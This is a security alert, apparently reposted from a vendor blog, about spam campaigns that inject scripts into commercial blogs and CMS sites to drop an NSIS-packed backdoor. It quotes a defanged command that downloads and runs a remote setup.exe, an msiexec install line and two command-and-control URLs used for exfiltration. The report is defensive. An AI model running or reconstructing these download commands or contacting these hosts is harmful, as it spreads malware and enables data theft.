We all know that cybercriminals never cease to look out for creative methods to launch
(more) targeted attacks with a smaller infrastructure to carry out, giving them easy access to users’ most valuable data.
Security researchers recently observed and analyzed various spam campaigns in which online criminals were trying to infect multiple commercial blogs and insecure Content Management Systems (CMS).
How the infection spreads (technical details explained)
In the analyzed spam campaigns, the attackers are baiting victims by trying to inject malicious scripts with the main purpose to run the following payload (sanitized for your own safety) on users’ machines:
Code:
cmd / c cd% Public% & @ echo AmmEiqWkls = “” https: //gullgas.weebly [.] com / uploads / 1/2/3/0/123060154 / setup.exe”
This particular “setup.exe” is a malicious file which is hidden in the Nullsoft Scriptable Install System (NSIS) package. This technique isn’t new, because we have seen it in previous
spam campaigns, but it’s notable how malicious actors improve the way they “pack” malicious code to deliver malware.
If the executable file is dropped on the infected machines, cybercriminals can collect sensitive information, such as: IP address, MAC address, manufacturer details, country name, Name and ID of the Operation System, CPUID or Hard Disk serial number. These data are stored in a Javascript object which is converted into JSON and then added in text strings.
Once attackers can remotely access the victim’s’ Windows machine, they will install the malicious executable file as follows:
Code:
msiexec.exe in C: Documents and Settings [user account] Local Settings Application Data Downloaded Installations {374BE032-0D10-4FAE-9C8E-BAC1B936896F} Setup12.msi “SETUPEXEDIR =” C: “SETUPEXENAME
All the data is then protected using this “UnqiueKeyGenerate.Encrypt (name)” function.
In the next step, the backdoor is copied to C: ProgramData in Windows Update folder, and then tries to check for an Internet connection to connect to the following C&C servers (sanitized for your own protection): http: //18.218.2 [.] 135 / service1.svc / applyingpoliciesrules / http: //18.218.2 [.] 135 / service1.svc / getInfoAfterInstall
After that, all data is accessed through these C&C servers, and the communication process is encrypted with a special key.
The main target of this type of attack is to exfiltrate data from compromised systems and to open a backdoor which allows online criminals to feed more malware into the targeted machines.
Heimdal Security proactively blocked these infected domains, so all Thor Home and Thor Enterprise users are protected.
According to
VirusTotal,
NO antivirus product out of 68 products has managed to detect this .exe file as malicious at the time we write this security alert.
![[Image: 3VM2SmP.jpg]](https://i.imgur.com/3VM2SmP.jpg)
![[Image: Security-Alert-about-script-injections-attack-1.png]](https://heimdalsecurity.com/blog/wp-content/uploads/Security-Alert-about-script-injections-attack-1.png)
![[-]](https://www.geeks.fyi/images/collapse.png)
